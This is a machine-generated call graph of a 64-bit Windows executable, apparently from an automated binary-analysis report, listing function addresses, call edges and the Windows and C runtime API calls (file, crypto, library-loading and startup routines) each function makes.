38428 7ff74ee7b779 38426->38428 38430 7ff74eea8d00 48 API calls 38426->38430 38707 7ff74eea8f94 38428->38707 38430->38426 38718 7ff74eebd840 WideCharToMultiByte 38431->38718 38435 7ff74ee7b9a1 38437 7ff74eea8d00 48 API calls 38435->38437 38438 7ff74ee7b9c4 38437->38438 38721 7ff74eea8d38 48 API calls 38438->38721 38440 7ff74ee7b910 38440->38435 38720 7ff74ee7945c 55 API calls _handle_error 38440->38720 38441 7ff74ee7b9d1 38722 7ff74eea8d38 48 API calls 38441->38722 38443 7ff74ee7b9de 38723 7ff74eea8d88 48 API calls 38443->38723 38445 7ff74ee7b9eb 38724 7ff74eea8d88 48 API calls 38445->38724 38447 7ff74ee7ba0b 38448 7ff74eea8d00 48 API calls 38447->38448 38449 7ff74ee7ba27 38448->38449 38725 7ff74eea8d88 48 API calls 38449->38725 38451 7ff74ee7ba37 38452 7ff74ee7ba49 38451->38452 38726 7ff74eebbc48 15 API calls 38451->38726 38727 7ff74eea8d88 48 API calls 38452->38727 38455 7ff74ee7ba59 38456 7ff74eea8d00 48 API calls 38455->38456 38457 7ff74ee7ba66 38456->38457 38458 7ff74eea8d00 48 API calls 38457->38458 38459 7ff74ee7ba78 38458->38459 38728 7ff74eea8d38 48 API calls 38459->38728 38461 7ff74ee7ba85 38729 7ff74eea8d88 48 API calls 38461->38729 38463 7ff74ee7ba92 38464 7ff74ee7bacd 38463->38464 38730 7ff74eea8d88 48 API calls 38463->38730 38732 7ff74eea8e3c 38464->38732 38467 7ff74ee7bab2 38731 7ff74eea8d88 48 API calls 38467->38731 38470 7ff74ee7bb33 38471 7ff74ee7bb53 38470->38471 38474 7ff74eea8e3c 48 API calls 38470->38474 38475 7ff74ee7bb6e 38471->38475 38477 7ff74eea8e3c 48 API calls 38471->38477 38472 7ff74eea8d00 48 API calls 38476 7ff74ee7bb09 38472->38476 38473 7ff74eea8e3c 48 API calls 38473->38470 38474->38471 38478 7ff74eea8f94 126 API calls 38475->38478 38476->38470 38476->38473 38477->38475 38478->38394 38480->38348 38481->38354 38483 7ff74ee96396 38482->38483 38485 7ff74ee963a0 38482->38485 38484 7ff74eeca444 new 4 API calls 38483->38484 38484->38485 38485->38358 38489 7ff74eeca44f 38486->38489 38487 7ff74eeca47a 38487->38372 38488 7ff74eed36c0 new 2 API calls 38488->38489 38489->38487 38489->38488 38920 7ff74eecb314 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38489->38920 38921 7ff74eecb2f4 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38489->38921 38492->38360 38494 7ff74eea9926 38493->38494 38495 7ff74eea993c 38493->38495 38496 7ff74ee890b8 75 API calls 38494->38496 38497 7ff74ee890b8 75 API calls 38495->38497 38498 7ff74eea9934 38496->38498 38497->38498 38498->38367 38499->38369 38505 7ff74eea96a4 38500->38505 38501 7ff74eea97d7 38502 7ff74ee92574 126 API calls 38502->38505 38504 7ff74eec9b98 216 API calls 38504->38505 38505->38501 38505->38502 38505->38504 38922 7ff74ee96498 72 API calls new 38505->38922 38506->38375 38508 7ff74ee89057 CryptGenRandom CryptReleaseContext 38507->38508 38509 7ff74ee8907e 38507->38509 38508->38509 38510 7ff74ee89089 38508->38510 38511 7ff74ee89c9c 11 API calls 38509->38511 38512 7ff74ee89c9c 38510->38512 38511->38510 38536 7ff74eebc0a8 GetSystemTime SystemTimeToFileTime 38512->38536 38514 7ff74ee89cc5 38539 7ff74eed2d74 38514->38539 38516 7ff74ee89cd7 38516->38381 38516->38516 38518 7ff74ee89c49 38517->38518 38519 7ff74eeb9d15 memcpy_s 38517->38519 38521 7ff74eeb9b70 38518->38521 38519->38518 38542 7ff74eeb9d74 38519->38542 38522 7ff74eeb9bd9 __scrt_fastfail 38521->38522 38525 7ff74eeb9bad __scrt_fastfail 38521->38525 38523 7ff74eeb9d74 8 API calls 38522->38523 38524 7ff74eeb9c07 38523->38524 38524->38385 38525->38522 38526 7ff74eeb9d74 8 API calls 38525->38526 38526->38522 38528 7ff74eeca61a 38527->38528 38529 7ff74eeca6a0 IsProcessorFeaturePresent 38528->38529 38530 7ff74ee89c86 38528->38530 38531 7ff74eeca6b7 38529->38531 38530->38347 38546 7ff74eeca894 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 38531->38546 38533 7ff74eeca6ca 38547 7ff74eeca66c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 38533->38547 38537 7ff74eeca610 _handle_error 8 API calls 38536->38537 38538 7ff74eebc0f1 38537->38538 38538->38514 38540 7ff74eed2d8b QueryPerformanceCounter 38539->38540 38541 7ff74eed2d87 38539->38541 38540->38541 38541->38516 38543 7ff74eeb9dbc 38542->38543 38543->38543 38544 7ff74eeca610 _handle_error 8 API calls 38543->38544 38545 7ff74eeb9f40 38544->38545 38545->38519 38546->38533 38549 7ff74ee7a4ea 38548->38549 38550 7ff74ee7a4ee 38549->38550 38739 7ff74ee92440 38549->38739 38550->38389 38553 7ff74ee7abbf pre_c_initialization 38552->38553 38554 7ff74eea8c1c 48 API calls 38553->38554 38557 7ff74ee7abf5 38554->38557 38555 7ff74ee7b4af 38558 7ff74ee7b4ff 38555->38558 38561 7ff74ee92574 126 API calls 38555->38561 38556 7ff74ee7acbf 38559 7ff74ee7b35c 38556->38559 38564 7ff74ee7acc8 38556->38564 38557->38555 38560 7ff74ee89be0 14 API calls 38557->38560 38578 7ff74ee7aca7 38557->38578 38768 7ff74eea72c0 38558->38768 38563 7ff74eea8eec 48 API calls 38559->38563 38565 7ff74ee7ac34 38560->38565 38561->38558 38566 7ff74ee7b395 38563->38566 38567 7ff74ee7acdd 38564->38567 38606 7ff74ee7aea7 38564->38606 38665 7ff74ee7ad60 38564->38665 38568 7ff74ee890b8 75 API calls 38565->38568 38569 7ff74ee7b3ad 38566->38569 38767 7ff74ee79e2c 48 API calls 38566->38767 38570 7ff74ee7ad68 38567->38570 38571 7ff74ee7ace6 38567->38571 38572 7ff74ee7ac8f 38568->38572 38576 7ff74eea8eec 48 API calls 38569->38576 38574 7ff74eea8eec 48 API calls 38570->38574 38571->38665 38749 7ff74eea8eec 38571->38749 38572->38578 38583 7ff74ee92574 126 API calls 38572->38583 38579 7ff74ee7ad9c 38574->38579 38575 7ff74eeca610 _handle_error 8 API calls 38580 7ff74ee7b52b 38575->38580 38581 7ff74ee7b3d4 38576->38581 38578->38555 38578->38556 38584 7ff74eea8eec 48 API calls 38579->38584 38580->38394 38585 7ff74ee7b3e6 38581->38585 38588 7ff74eea8eec 48 API calls 38581->38588 38583->38578 38587 7ff74ee7ada9 38584->38587 38589 7ff74eea8eec 48 API calls 38585->38589 38586 7ff74eea8eec 48 API calls 38590 7ff74ee7ad31 38586->38590 38591 7ff74eea8eec 48 API calls 38587->38591 38588->38585 38592 7ff74ee7b451 38589->38592 38593 7ff74eea8eec 48 API calls 38590->38593 38594 7ff74ee7adb5 38591->38594 38595 7ff74ee7b471 38592->38595 38602 7ff74eea8eec 48 API calls 38592->38602 38596 7ff74ee7ad46 38593->38596 38597 7ff74eea8eec 48 API calls 38594->38597 38600 7ff74ee7b486 38595->38600 38603 7ff74eea8e3c 48 API calls 38595->38603 38599 7ff74eea8f94 126 API calls 38596->38599 38598 7ff74ee7adc2 38597->38598 38601 7ff74eea8d00 48 API calls 38598->38601 38599->38665 38604 7ff74eea8f94 126 API calls 38600->38604 38605 7ff74ee7adcf 38601->38605 38602->38595 38603->38600 38604->38665 38608 7ff74ee890b8 75 API calls 38605->38608 38607 7ff74ee7afda 38606->38607 38757 7ff74ee79b64 48 API calls _handle_error 38606->38757 38614 7ff74ee7aff2 38607->38614 38758 7ff74ee79d98 48 API calls 38607->38758 38610 7ff74ee7ae22 38608->38610 38612 7ff74eea8e3c 48 API calls 38610->38612 38613 7ff74ee7ae33 38612->38613 38615 7ff74eea8e3c 48 API calls 38613->38615 38616 7ff74ee7b02b 38614->38616 38759 7ff74ee79efc 48 API calls _handle_error 38614->38759 38618 7ff74ee7ae48 38615->38618 38617 7ff74ee7b0af 38616->38617 38760 7ff74ee7a2c8 48 API calls 38616->38760 38620 7ff74ee7b0c8 38617->38620 38761 7ff74ee7a1a0 48 API calls 2 library calls 38617->38761 38625 7ff74eeb9ce4 8 API calls 38618->38625 38623 7ff74ee7b0e2 38620->38623 38762 7ff74ee7a350 48 API calls _handle_error 38620->38762 38626 7ff74eea8eec 48 API calls 38623->38626 38627 7ff74ee7ae60 38625->38627 38628 7ff74ee7b0fc 38626->38628 38629 7ff74eeb9b70 8 API calls 38627->38629 38630 7ff74eea8eec 48 API calls 38628->38630 38631 7ff74ee7ae6d 38629->38631 38632 7ff74ee7b109 38630->38632 38633 7ff74eea8e3c 48 API calls 38631->38633 38635 7ff74ee7b11f 38632->38635 38637 7ff74eea8eec 48 API calls 38632->38637 38634 7ff74ee7ae80 38633->38634 38636 7ff74eea8f94 126 API calls 38634->38636 38753 7ff74eea8e94 38635->38753 38636->38665 38637->38635 38640 7ff74eea8eec 48 API calls 38641 7ff74ee7b147 38640->38641 38642 7ff74eea8e94 48 API calls 38641->38642 38643 7ff74ee7b15f 38642->38643 38644 7ff74eea8eec 48 API calls 38643->38644 38647 7ff74ee7b16c 38644->38647 38645 7ff74ee7b18a 38646 7ff74ee7b1a9 38645->38646 38764 7ff74eea8d88 48 API calls 38645->38764 38649 7ff74eea8e94 48 API calls 38646->38649 38647->38645 38763 7ff74eea8d88 48 API calls 38647->38763 38651 7ff74ee7b1bc 38649->38651 38652 7ff74eea8eec 48 API calls 38651->38652 38653 7ff74ee7b1d6 38652->38653 38655 7ff74ee7b1e9 38653->38655 38765 7ff74ee7c3c8 CharLowerW CharUpperW 38653->38765 38655->38655 38656 7ff74eea8eec 48 API calls 38655->38656 38657 7ff74ee7b21f 38656->38657 38658 7ff74eea8e3c 48 API calls 38657->38658 38659 7ff74ee7b230 38658->38659 38660 7ff74ee7b247 38659->38660 38661 7ff74eea8e3c 48 API calls 38659->38661 38662 7ff74eea8f94 126 API calls 38660->38662 38661->38660 38663 7ff74ee7b278 38662->38663 38663->38665 38766 7ff74eea70d8 4 API calls 2 library calls 38663->38766 38665->38575 38780 7ff74eea8f28 38666->38780 38669 7ff74ee890b8 38670 7ff74ee891a9 38669->38670 38671 7ff74ee89123 38669->38671 38672 7ff74eeca610 _handle_error 8 API calls 38670->38672 38671->38670 38798 7ff74eeb7e74 38671->38798 38674 7ff74ee7b66e 38672->38674 38685 7ff74ee92574 38674->38685 38676 7ff74eebd840 WideCharToMultiByte 38677 7ff74ee89157 38676->38677 38677->38670 38678 7ff74ee891c4 38677->38678 38679 7ff74ee8916a 38677->38679 38817 7ff74ee89338 12 API calls _handle_error 38678->38817 38680 7ff74ee8916f 38679->38680 38681 7ff74ee891ab 38679->38681 38680->38670 38802 7ff74ee898b0 38680->38802 38816 7ff74ee8951c 71 API calls _handle_error 38681->38816 38686 7ff74ee925a5 38685->38686 38687 7ff74ee9259e 38685->38687 38688 7ff74ee925ab GetStdHandle 38686->38688 38693 7ff74ee925ba 38686->38693 38687->38397 38688->38693 38689 7ff74ee92619 WriteFile 38689->38693 38690 7ff74ee925cf WriteFile 38691 7ff74ee9260b 38690->38691 38690->38693 38691->38690 38691->38693 38692 7ff74ee92658 GetLastError 38692->38693 38693->38687 38693->38689 38693->38690 38693->38692 38698 7ff74ee92721 38693->38698 38914 7ff74ee93144 9 API calls 2 library calls 38693->38914 38915 7ff74ee8cf34 10 API calls 38693->38915 38916 7ff74ee8c95c 126 API calls 38693->38916 38695 7ff74ee92684 SetLastError 38695->38693 38917 7ff74ee8cf14 10 API calls 38698->38917 38701 7ff74ee7161c 48 API calls 38700->38701 38702 7ff74ee7b719 38701->38702 38703 7ff74eea8d38 48 API calls 38702->38703 38703->38421 38704->38423 38705->38424 38706->38426 38708 7ff74eea9131 38707->38708 38709 7ff74eea8fcf 38707->38709 38708->38394 38716 7ff74eea905d 38709->38716 38918 7ff74ee8ca6c 48 API calls 2 library calls 38709->38918 38710 7ff74ee7161c 48 API calls 38711 7ff74eea90e0 38710->38711 38711->38708 38712 7ff74ee92574 126 API calls 38711->38712 38712->38708 38714 7ff74eea904c 38919 7ff74ee8ca40 61 API calls _CxxThrowException 38714->38919 38716->38710 38716->38711 38717->38431 38719 7ff74ee7b8f8 CharToOemA 38718->38719 38719->38440 38720->38435 38721->38441 38722->38443 38723->38445 38724->38447 38725->38451 38726->38452 38727->38455 38728->38461 38729->38463 38730->38467 38731->38464 38733 7ff74ee7161c 48 API calls 38732->38733 38734 7ff74ee7baf2 38733->38734 38734->38470 38734->38472 38734->38476 38735->38409 38736->38413 38737->38416 38738->38399 38740 7ff74ee92454 38739->38740 38741 7ff74ee9246a SetFilePointer 38739->38741 38742 7ff74ee924ad 38740->38742 38747 7ff74ee8cd00 10 API calls 38740->38747 38741->38742 38743 7ff74ee9248d GetLastError 38741->38743 38742->38550 38743->38742 38745 7ff74ee92497 38743->38745 38745->38742 38748 7ff74ee8cd00 10 API calls 38745->38748 38750 7ff74eea8efc 38749->38750 38751 7ff74eea8d00 48 API calls 38750->38751 38752 7ff74ee7ad24 38750->38752 38751->38750 38752->38586 38754 7ff74eea8eac 38753->38754 38755 7ff74eea8d00 48 API calls 38754->38755 38756 7ff74ee7b137 38754->38756 38755->38754 38756->38640 38757->38607 38758->38614 38759->38616 38760->38617 38761->38620 38762->38623 38763->38645 38764->38646 38765->38655 38766->38665 38767->38569 38769 7ff74eea72dd 38768->38769 38771 7ff74eea7304 38769->38771 38772 7ff74eeca480 38769->38772 38771->38665 38773 7ff74eeca444 38772->38773 38774 7ff74eeca47a 38773->38774 38775 7ff74eed36c0 new 2 API calls 38773->38775 38778 7ff74eecb314 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38773->38778 38779 7ff74eecb2f4 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38773->38779 38774->38771 38775->38773 38783 7ff74ee7161c 38780->38783 38782 7ff74ee7b601 38782->38397 38782->38399 38782->38669 38784 7ff74ee71640 38783->38784 38793 7ff74ee716aa memcpy_s 38783->38793 38785 7ff74ee7166d 38784->38785 38794 7ff74ee8ca6c 48 API calls 2 library calls 38784->38794 38789 7ff74ee716d4 38785->38789 38790 7ff74ee7168e 38785->38790 38787 7ff74ee71661 38795 7ff74ee8cb64 8 API calls 38787->38795 38789->38793 38797 7ff74ee8cb64 8 API calls 38789->38797 38790->38793 38796 7ff74ee8cb64 8 API calls 38790->38796 38793->38782 38794->38787 38799 7ff74ee89143 38798->38799 38800 7ff74eeb7e95 38798->38800 38799->38676 38818 7ff74eeb7ec8 38800->38818 38803 7ff74ee89920 38802->38803 38812 7ff74ee89b45 38802->38812 38807 7ff74ee8996d 38803->38807 38808 7ff74ee89b75 38803->38808 38850 7ff74eeb7da8 38803->38850 38804 7ff74eeca610 _handle_error 8 API calls 38805 7ff74ee89b61 38804->38805 38805->38670 38857 7ff74ee8a0f4 38807->38857 38810 7ff74eeb7f24 68 API calls 38808->38810 38813 7ff74ee89acb 38810->38813 38811 7ff74ee899d0 38811->38811 38873 7ff74eeb7f24 38811->38873 38812->38804 38813->38812 38887 7ff74eeb4ea8 8 API calls _handle_error 38813->38887 38816->38670 38817->38670 38819 7ff74eeb7efa memcpy_s 38818->38819 38824 7ff74eeb7fb5 38819->38824 38832 7ff74eebb3f0 38819->38832 38822 7ff74eeb805c GetCurrentProcessId 38823 7ff74eeb8034 38822->38823 38823->38799 38824->38822 38826 7ff74eeb7ff1 38824->38826 38825 7ff74eeb7f7e GetProcAddressForCaller GetProcAddress 38825->38824 38826->38823 38841 7ff74ee8ca6c 48 API calls 2 library calls 38826->38841 38828 7ff74eeb801f 38842 7ff74ee8cda4 10 API calls 2 library calls 38828->38842 38830 7ff74eeb8027 38843 7ff74ee8ca40 61 API calls _CxxThrowException 38830->38843 38844 7ff74eeca5a0 38832->38844 38835 7ff74eebb428 38839 7ff74eeca610 _handle_error 8 API calls 38835->38839 38836 7ff74eebb42c 38846 7ff74eea48bc 38836->38846 38840 7ff74eeb7f72 38839->38840 38840->38824 38840->38825 38841->38828 38842->38830 38843->38823 38845 7ff74eebb3fc GetSystemDirectoryW 38844->38845 38845->38835 38845->38836 38847 7ff74eea48cb pre_c_initialization 38846->38847 38848 7ff74eeca610 _handle_error 8 API calls 38847->38848 38849 7ff74eea493a LoadLibraryExW 38848->38849 38849->38835 38851 7ff74eeb7e74 68 API calls 38850->38851 38852 7ff74eeb7ddc 38851->38852 38853 7ff74eeb7e74 68 API calls 38852->38853 38854 7ff74eeb7def 38853->38854 38855 7ff74eeca610 _handle_error 8 API calls 38854->38855 38856 7ff74eeb7e43 38855->38856 38856->38803 38860 7ff74ee8a15c memcpy_s 38857->38860 38858 7ff74ee8a358 38910 7ff74eeca774 8 API calls __report_securityfailure 38858->38910 38859 7ff74ee8a352 38909 7ff74eeca774 8 API calls __report_securityfailure 38859->38909 38860->38858 38860->38859 38862 7ff74ee8a192 38860->38862 38863 7ff74ee8a34d 38860->38863 38888 7ff74ee89dd8 38862->38888 38908 7ff74eeca774 8 API calls __report_securityfailure 38863->38908 38865 7ff74ee8a35e 38868 7ff74ee8a1d9 38869 7ff74ee89dd8 8 API calls 38868->38869 38870 7ff74ee8a2f1 38868->38870 38869->38868 38871 7ff74eeca610 _handle_error 8 API calls 38870->38871 38872 7ff74ee8a33b 38871->38872 38872->38811 38874 7ff74eeb7f5e 38873->38874 38879 7ff74eeb7fb5 38873->38879 38875 7ff74eebb3f0 10 API calls 38874->38875 38874->38879 38876 7ff74eeb7f72 38875->38876 38876->38879 38880 7ff74eeb7f7e GetProcAddressForCaller GetProcAddress 38876->38880 38877 7ff74eeb805c GetCurrentProcessId 38878 7ff74eeb8034 38877->38878 38878->38813 38879->38877 38881 7ff74eeb7ff1 38879->38881 38880->38879 38881->38878 38911 7ff74ee8ca6c 48 API calls 2 library calls 38881->38911 38883 7ff74eeb801f 38912 7ff74ee8cda4 10 API calls 2 library calls 38883->38912 38885 7ff74eeb8027 38913 7ff74ee8ca40 61 API calls _CxxThrowException 38885->38913 38887->38812 38889 7ff74ee89e46 38888->38889 38892 7ff74ee89e6e __scrt_fastfail 38888->38892 38890 7ff74eeb9ce4 8 API calls 38889->38890 38891 7ff74ee89e5e 38890->38891 38893 7ff74eeb9b70 8 API calls 38891->38893 38894 7ff74ee89e85 38892->38894 38896 7ff74eeb9ce4 8 API calls 38892->38896 38893->38892 38895 7ff74eeb9ce4 8 API calls 38894->38895 38897 7ff74ee89f97 38895->38897 38896->38894 38898 7ff74eeb9b70 8 API calls 38897->38898 38899 7ff74ee89fa8 __scrt_fastfail 38898->38899 38900 7ff74ee89fb4 38899->38900 38903 7ff74eeb9ce4 8 API calls 38899->38903 38901 7ff74eeb9ce4 8 API calls 38900->38901 38902 7ff74ee8a0bb 38901->38902 38904 7ff74eeb9b70 8 API calls 38902->38904 38903->38900 38905 7ff74ee8a0c9 38904->38905 38906 7ff74eeca610 _handle_error 8 API calls 38905->38906 38907 7ff74ee8a0d8 38906->38907 38907->38868 38908->38859 38909->38858 38910->38865 38911->38883 38912->38885 38913->38878 38914->38695 38916->38693 38918->38714 38919->38716 38922->38505 38923 7ff74eeba924 38924 7ff74eeba949 snprintf 38923->38924 38925 7ff74eeba97f CompareStringA 38924->38925 38926 7ff74eed231c 38927 7ff74eed2342 GetModuleHandleW 38926->38927 38928 7ff74eed238c 38926->38928 38927->38928 38934 7ff74eed234f 38927->38934 38939 7ff74eed6938 EnterCriticalSection 38928->38939 38930 7ff74eed6998 fflush LeaveCriticalSection 38932 7ff74eed2460 38930->38932 38931 7ff74eed2396 38935 7ff74eed2410 38931->38935 38937 7ff74eed43b8 16 API calls 38931->38937 38933 7ff74eed246c 38932->38933 38936 7ff74eed2488 11 API calls 38932->38936 38934->38928 38940 7ff74eed24d4 GetModuleHandleExW 38934->38940 38935->38930 38936->38933 38937->38935 38941 7ff74eed2525 38940->38941 38942 7ff74eed24fe GetProcAddress 38940->38942 38944 7ff74eed2535 38941->38944 38945 7ff74eed252f FreeLibrary 38941->38945 38942->38941 38943 7ff74eed2518 38942->38943 38943->38941 38944->38928 38945->38944 38946 7ff74eecb0fc 38965 7ff74eecaa8c 38946->38965 38949 7ff74eecb123 __scrt_acquire_startup_lock 38951 7ff74eecb148 38949->38951 39021 7ff74eecb52c 7 API calls __scrt_fastfail 38949->39021 38955 7ff74eecb169 __scrt_is_nonwritable_in_current_image __scrt_release_startup_lock 38951->38955 38973 7ff74eed472c 38951->38973 38954 7ff74eecb16d 38955->38954 38956 7ff74eecb1f7 38955->38956 39022 7ff74eed2574 35 API calls __FrameUnwindToState 38955->39022 38977 7ff74eed3fc4 38956->38977 38963 7ff74eecb220 39023 7ff74eecac64 8 API calls 2 library calls 38963->39023 38966 7ff74eecaaae __isa_available_init 38965->38966 39024 7ff74eece2f8 38966->39024 38969 7ff74eecaab7 38969->38949 39020 7ff74eecb52c 7 API calls __scrt_fastfail 38969->39020 38974 7ff74eed4744 38973->38974 38975 7ff74eed4766 38974->38975 39073 7ff74eecb010 38974->39073 38975->38955 38978 7ff74eed3fd4 38977->38978 38979 7ff74eecb20c 38977->38979 39158 7ff74eed3c84 38978->39158 38981 7ff74eea7e20 38979->38981 39190 7ff74eebb470 GetModuleHandleW 38981->39190 38987 7ff74eea7e58 SetErrorMode GetModuleHandleW 38988 7ff74eeb48cc 21 API calls 38987->38988 38989 7ff74eea7e7d 38988->38989 38990 7ff74eeb3e48 137 API calls 38989->38990 38991 7ff74eea7e90 38990->38991 38992 7ff74ee83d3c 126 API calls 38991->38992 38993 7ff74eea7e9c 38992->38993 38994 7ff74eeca444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38993->38994 38995 7ff74eea7ead 38994->38995 38996 7ff74eea7ebf 38995->38996 38997 7ff74ee83f18 70 API calls 38995->38997 38998 7ff74ee84d1c 157 API calls 38996->38998 38997->38996 38999 7ff74eea7ed6 38998->38999 39000 7ff74eea7eef 38999->39000 39001 7ff74ee86ad0 154 API calls 38999->39001 39002 7ff74ee84d1c 157 API calls 39000->39002 39003 7ff74eea7ee7 39001->39003 39004 7ff74eea7eff 39002->39004 39005 7ff74ee84e48 160 API calls 39003->39005 39006 7ff74eea7f0d 39004->39006 39008 7ff74eea7f14 39004->39008 39005->39000 39007 7ff74eebb650 CreateEventW CloseHandle CreateEventW GetLastError CloseHandle 39006->39007 39007->39008 39009 7ff74ee84888 58 API calls 39008->39009 39010 7ff74eea7f57 39009->39010 39011 7ff74ee84fd0 268 API calls 39010->39011 39012 7ff74eea7f5f 39011->39012 39013 7ff74eea7f9e 39012->39013 39014 7ff74eea7f8c 39012->39014 39018 7ff74eecb684 GetModuleHandleW 39013->39018 39015 7ff74eebb650 CreateEventW CloseHandle CreateEventW GetLastError CloseHandle 39014->39015 39016 7ff74eea7f93 39015->39016 39016->39013 39017 7ff74eebb57c 14 API calls 39016->39017 39017->39013 39019 7ff74eecb698 39018->39019 39019->38963 39020->38949 39021->38951 39022->38956 39023->38954 39025 7ff74eece301 __vcrt_initialize_pure_virtual_call_handler __vcrt_initialize_winapi_thunks 39024->39025 39037 7ff74eeceb08 39025->39037 39028 7ff74eecaab3 39028->38969 39032 7ff74eed45e4 39028->39032 39030 7ff74eece318 39030->39028 39044 7ff74eeceb50 DeleteCriticalSection 39030->39044 39033 7ff74eed9d4c 39032->39033 39034 7ff74eecaac0 39033->39034 39061 7ff74eed66c0 39033->39061 39034->38969 39036 7ff74eece32c 8 API calls 3 library calls 39034->39036 39036->38969 39039 7ff74eeceb10 39037->39039 39040 7ff74eeceb41 39039->39040 39041 7ff74eece30b 39039->39041 39045 7ff74eece678 39039->39045 39050 7ff74eeceb50 DeleteCriticalSection 39040->39050 39041->39028 39043 7ff74eece8a4 8 API calls 3 library calls 39041->39043 39043->39030 39044->39028 39051 7ff74eece34c 39045->39051 39048 7ff74eece6cf InitializeCriticalSectionAndSpinCount 39049 7ff74eece6bb 39048->39049 39049->39039 39050->39041 39052 7ff74eece3b2 39051->39052 39054 7ff74eece3ad 39051->39054 39052->39048 39052->39049 39053 7ff74eece3e5 LoadLibraryExW 39053->39054 39056 7ff74eece40b GetLastError 39053->39056 39054->39052 39054->39053 39057 7ff74eece47a 39054->39057 39060 7ff74eece458 FreeLibrary 39054->39060 39055 7ff74eece489 GetProcAddress 39055->39052 39058 7ff74eece4a1 39055->39058 39056->39054 39059 7ff74eece416 LoadLibraryExW 39056->39059 39057->39052 39057->39055 39058->39052 39059->39054 39060->39054 39072 7ff74eed6938 EnterCriticalSection 39061->39072 39063 7ff74eed66d0 39064 7ff74eed8050 32 API calls 39063->39064 39065 7ff74eed66d9 39064->39065 39066 7ff74eed64d0 34 API calls 39065->39066 39071 7ff74eed66e7 39065->39071 39068 7ff74eed66e2 39066->39068 39067 7ff74eed6998 fflush LeaveCriticalSection 39069 7ff74eed66f3 39067->39069 39070 7ff74eed65bc GetStdHandle GetFileType 39068->39070 39069->39033 39070->39071 39071->39067 39074 7ff74eecb020 pre_c_initialization 39073->39074 39094 7ff74eed2b00 39074->39094 39076 7ff74eecb02c pre_c_initialization 39100 7ff74eecaad8 39076->39100 39078 7ff74eecb045 39079 7ff74eecb0b5 39078->39079 39080 7ff74eecb049 _RTC_Initialize 39078->39080 39137 7ff74eecb52c 7 API calls __scrt_fastfail 39079->39137 39105 7ff74eecace0 39080->39105 39082 7ff74eecb0bf 39138 7ff74eecb52c 7 API calls __scrt_fastfail 39082->39138 39085 7ff74eecb05a pre_c_initialization 39108 7ff74eed3b0c 39085->39108 39086 7ff74eecb0ca __scrt_initialize_default_local_stdio_options 39086->38974 39089 7ff74eecb06a 39136 7ff74eecb7dc RtlInitializeSListHead 39089->39136 39091 7ff74eecb06f pre_c_initialization 39092 7ff74eed4818 pre_c_initialization 35 API calls 39091->39092 39093 7ff74eecb09a pre_c_initialization 39092->39093 39093->38974 39095 7ff74eed2b11 39094->39095 39096 7ff74eed2b19 39095->39096 39139 7ff74eed4f3c 15 API calls _set_errno_from_matherr 39095->39139 39096->39076 39098 7ff74eed2b28 39140 7ff74eed4e1c 31 API calls _invalid_parameter_noinfo 39098->39140 39101 7ff74eecab96 39100->39101 39104 7ff74eecaaf0 __scrt_initialize_onexit_tables 39100->39104 39141 7ff74eecb52c 7 API calls __scrt_fastfail 39101->39141 39103 7ff74eecaba0 39104->39078 39142 7ff74eecac90 39105->39142 39107 7ff74eecace9 39107->39085 39109 7ff74eed3b40 39108->39109 39110 7ff74eed3b2a 39108->39110 39149 7ff74eed9370 39109->39149 39147 7ff74eed4f3c 15 API calls _set_errno_from_matherr 39110->39147 39113 7ff74eed3b2f 39148 7ff74eed4e1c 31 API calls _invalid_parameter_noinfo 39113->39148 39116 7ff74eed3b72 39153 7ff74eed38ec 35 API calls pre_c_initialization 39116->39153 39117 7ff74eecb066 39117->39082 39117->39089 39119 7ff74eed3b9c 39154 7ff74eed3aa8 15 API calls 2 library calls 39119->39154 39121 7ff74eed3bb2 39122 7ff74eed3bcb 39121->39122 39123 7ff74eed3bba 39121->39123 39156 7ff74eed38ec 35 API calls pre_c_initialization 39122->39156 39155 7ff74eed4f3c 15 API calls _set_errno_from_matherr 39123->39155 39126 7ff74eed4a74 __free_lconv_mon 15 API calls 39126->39117 39127 7ff74eed3be7 39128 7ff74eed3c30 39127->39128 39129 7ff74eed3c17 39127->39129 39133 7ff74eed3bbf 39127->39133 39131 7ff74eed4a74 __free_lconv_mon 15 API calls 39128->39131 39130 7ff74eed4a74 __free_lconv_mon 15 API calls 39129->39130 39132 7ff74eed3c20 39130->39132 39131->39133 39134 7ff74eed4a74 __free_lconv_mon 15 API calls 39132->39134 39133->39126 39135 7ff74eed3c2c 39134->39135 39135->39117 39137->39082 39138->39086 39139->39098 39140->39096 39141->39103 39143 7ff74eecacbf 39142->39143 39145 7ff74eecacb5 _onexit 39142->39145 39146 7ff74eed4434 34 API calls _onexit 39143->39146 39145->39107 39146->39145 39147->39113 39148->39117 39150 7ff74eed3b45 GetModuleFileNameA 39149->39150 39151 7ff74eed937d 39149->39151 39150->39116 39157 7ff74eed91b0 48 API calls 4 library calls 39151->39157 39153->39119 39154->39121 39155->39133 39156->39127 39157->39150 39159 7ff74eed3c98 39158->39159 39163 7ff74eed3ca1 39158->39163 39159->39163 39164 7ff74eed3ccc 39159->39164 39163->38979 39165 7ff74eed3ce5 39164->39165 39174 7ff74eed3caa 39164->39174 39166 7ff74eed9370 pre_c_initialization 48 API calls 39165->39166 39167 7ff74eed3cea 39166->39167 39177 7ff74eed978c GetEnvironmentStringsW 39167->39177 39170 7ff74eed3cf7 39173 7ff74eed4a74 __free_lconv_mon 15 API calls 39170->39173 39172 7ff74eed3d04 39175 7ff74eed4a74 __free_lconv_mon 15 API calls 39172->39175 39173->39174 39174->39163 39176 7ff74eed3e78 17 API calls 2 library calls 39174->39176 39175->39170 39176->39163 39178 7ff74eed985e 39177->39178 39179 7ff74eed97ba WideCharToMultiByte 39177->39179 39182 7ff74eed3cef 39178->39182 39183 7ff74eed9868 FreeEnvironmentStringsW 39178->39183 39179->39178 39181 7ff74eed9814 39179->39181 39184 7ff74eed4ab4 setbuf 16 API calls 39181->39184 39182->39170 39189 7ff74eed3d38 31 API calls 4 library calls 39182->39189 39183->39182 39185 7ff74eed981c 39184->39185 39186 7ff74eed9824 WideCharToMultiByte 39185->39186 39187 7ff74eed984b 39185->39187 39186->39187 39188 7ff74eed4a74 __free_lconv_mon 15 API calls 39187->39188 39188->39178 39189->39172 39191 7ff74eebb496 